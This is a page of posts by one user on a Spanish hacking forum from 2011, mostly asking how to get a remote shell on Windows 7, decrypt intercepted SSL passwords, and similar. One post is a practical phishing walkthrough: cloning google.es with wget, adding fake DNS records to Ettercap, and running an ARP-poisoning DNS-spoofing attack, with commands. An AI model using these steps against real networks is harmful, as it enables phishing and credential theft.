elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Rompecabezas de Bitcoin, Medio millón USD en premios


  Mostrar Temas
Páginas: 1 2 [3] 4
21  Foros Generales / Foro Libre / CUIDADIN con los yankies... en: 26 Septiembre 2011, 22:14 pm
nueva ciberestrategia de EE. UU. autorizaría acciones militares contra ataques hacker, CUIDADIN con los yankies...




22  Seguridad Informática / Hacking / Win 7 SP1 invulnerable ?? en: 12 Agosto 2011, 20:14 pm
Despues de bastantes (demasiadas) horas intentando crearme una shell remota contra una maquina con W7 SP1 actualizado, no he logrado ningun resultado, comenzé com metasploit y todos los relacionados con windows,(que no son pocos), continué luego con SET, clonando alguna web e intentando enviar algun archivo Java pernicioso, pero tampoco obtengo algun resultado, la verdad es que desconozco si existe alguna otra aplicacion adecuada (que no sea Armitage,por supuesto).

Si alguien conoce algun procedimiento,agradeceria que respondira con algun enlace o nombre de programa.
Si yo fuese informático, intentaría por mis medios desarrollar algun exploit, pero carezco de los conocimientos.  Gracias...


23  Seguridad Informática / Hacking / Alguien se ha descargado el winAUTOPWN 2.7 ?? en: 5 Agosto 2011, 09:49 am
Si alguien lo tiene le agradeceria que posteara algun enlace para descargarlo,con la pagina oficial:   http://winautopwn.co.nr/   no hay forma de conectar.
Gracias anticipadas.
24  Seguridad Informática / Hacking / Windows 7 - icslap - TCP puerto 2869 - Algun fallo conocido? en: 28 Julio 2011, 21:27 pm
Conoce alguien alguna vulnerabilidad de este servicio?
25  Seguridad Informática / Hacking / Proxy gratuitos ¿Realmente anónimos y seguros? en: 30 Abril 2011, 23:13 pm
Recientemente he participado en un curso sobre seguridad en redes y hemos hablado de lo confiados que se vuelven algunos hackers y otros usuarios de la red.

Existe la creencia general de que navegando a traves de uno o varios proxys se asegura el total anonimato, así como se mantiene el secreto sobre los sitios escaneados o atacados de alguna forma.

El simple hecho de conectarnos a un proxy, del cual desconocemos la mayoria de sus datos, es ya de por si una brecha de seguridad, no sabemos quien controla ese proxy ni de que forma pueden ser nuestros comunicaciones supervisadas o registradas.

La etiqueta de "gratuito " tambien es sospechosa, nadie da nada libremente y sin motivo. El tener una maquina ejecutando un programa proxy en la red, solamente para que otras personas naveguen anonimamente (por amor al arte), no creo que sea la razon real.

Si algun gobierno quiere supervisar parte del tráfico, puede poner varios proxys anonimos y gratuitos, con esto se aseguran de vigilar silenciosamente, y sin incumplir normas, ya que la gente se conecta voluntariamente a sus equipos.

En varios sitios de la red se menciona este controvertido tema:

http://www.privateproxysoftware.com/AnonymousProxyArticles/Free_Anonymous_Proxy_Why_Not.html

http://serverfault.com/questions/139687/do-proxies-really-provide-anonymity
26  Seguridad Informática / Materiales y equipos / Chipset Ralink 3070, ¿¿ funciona con BT4 ?? en: 24 Abril 2011, 21:13 pm
Estoy pensando en adquirir este adaptador:

http://www.dealextreme.com/p/high-power-3000mw-802-11b-g-n-150mbps-usb-2-0-wireless-network-adapter-w-18dbi-directional-antenna-59045

Sabe alguien si BT4 será capaz de ponerlo en modo monitor ?.



27  Seguridad Informática / Seguridad / SSH, puerto 22 ,Debian , ¿ Que proceso lo abre ? en: 15 Abril 2011, 10:09 am
Tras instalar una distribucion Debian, sin entorno gráfico ni programas añadidos, y realizar un análisis con OpenVas, observo que el puerto 22 está abierto por algun servicio que usa SSH.
Mi problema es como averiguo que servicio exactamente es el que abre este puerto, y porqué , con netstat  no lo tengo claro.

Aún no tengo instalado Apache,ni FTP, ni DHCP3 ni BIND ni nada, solamente la distribución básica y sin ningun Xserver.




28  Informática / Tutoriales - Documentación / Tutorial practico OpenVas - Analisis vulnerabilidades - en Español en: 10 Abril 2011, 01:58 am
Para alguno que lo habia solicitado aqui les dejo un manual practico en español de uso del programa Openvas para el análisis de vulnerabilidades.

Incluye capturas de pantalla de cada uno de los pasos,desde la creación de usuario hasta un análisis real a un equipo, con los resultados de las pruebas.


https://docs.google.com/open?id=0B_NNd4pZzfBPWnZtUWltQmNlNG8



29  Seguridad Informática / Hacking / Redireccionar el tráfico de una página Web a una pagina falsa - phising en: 22 Marzo 2011, 10:24 am
Para este ejercicio se falseará la página Web de www.google.es.

El primer paso será descargar la página original, para luego modificarla y cuando el equipo víctima intente acceder a www.google.es, la página que le será servida será la que yo he modificado.

Desde el equipo atacante, Linux (Back-Trak 4.2 en este caso), se procede a la descarga de la página original,

para ello utilizaremos wget (Fig. 6-1)

Wget -r -d 3 www.google.es

Las opciones utilizadas son:

-r Para que realiza una descarga recursiva, con lo que intentará descargar el contenido
De cada uno de los enlaces que se encuentren en dicha página y así con cualquier
enlace encontrado, recursivamente.
-d Para fijar la profundidad de la recursividad, solo voy a descargar 3 niveles de
Enlaces en este ejercicio.

Seguidamente consultamos el directorio por defecto para el servidor Web Apache,
mirando el archivo: /etc/apache2/sites-available

Como podemos observar en la imagen 6-2, el directorio por defecto es /var/www/

Modificaremos nuestra falsa página y la ubicaremos en el directorio señalado
anteriormente y lanzamos el servidor Apache.

Modificar el archivo /usr/share/ettercap/etter.dns, para crear las falsas resoluciones DNS que conduzcan a la victima hacia nuestro servidor Apache. (Fig. 6-4)

Añadir nuestras falsas DNS:
*.google.es A 172.30.2.100
*.google.com A 172.30.2.100
(Siendo 172.30.2.100 sea nuestra dirección IP)

Lanzar ataque MITM con falsificación de DNS, para ello utilizamos Ettercap, modo consola: (Fig. 6-5)

ettercap -q -T -M arp -P dns_spoof /172.30.2.129/ /172.30.2.131/ -n
255.255.255.0


-q modo silencioso, no imprime en pantalla los paquetes enviados
-T Usado solo en modo texto
-M Activa ataque MITM
Arp método utilizado en el MITM (arp Poisoning, en este caso)
-P Utilizar un plugging
dns_spoof Éste es el plugin seleccionado
/ip_addres/ Una de las IP para atacar
/ip_addres/ la otra IP
-n <netmask> Usado en caso de cambio de segmento de red,máscara

El resultado del envenenamiento, desde el equipo cliente, al intentar acceder a la página
www.google.es, éste será dirigido hacia la falsificación creada en el equipo atacante.


Aqui está el ejercicio completo con imágenes y en Español:

http://rapidshare.com/files/453789692/Direccionamiento_phising_WEB_SITE.pdf

30  Seguridad Informática / Hacking / Ettercap - Contraseña SSL - Cual es mejor forma? en: 6 Marzo 2011, 22:23 pm
Hola a todos, llevo poco tiempo en el mundo del Hacking,y me doy cuenta de que cuanto mas estudio, mas parece quedarme por aprender.

Tras analizar con Wireshark el trafico generado por cierta pagina web de entrada de usuario y contraseña, observo que utiliza el protocolo SSL, haciendo ARP-Spoof con Ettercap,éste no parece ser capaz de descifrar éste protocolo,aunque he leido que Ettercap es capaz.

Mi pregunta es si alguien sabe el procedimiento,o que pluggin es necesario para conseguirlo.
Lo he intentado desde Windows, y desde Linux,con BackTrack, pero ni en modo consola lo he logrado.
Gracias por cualquier ayuda o sugerencia.
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines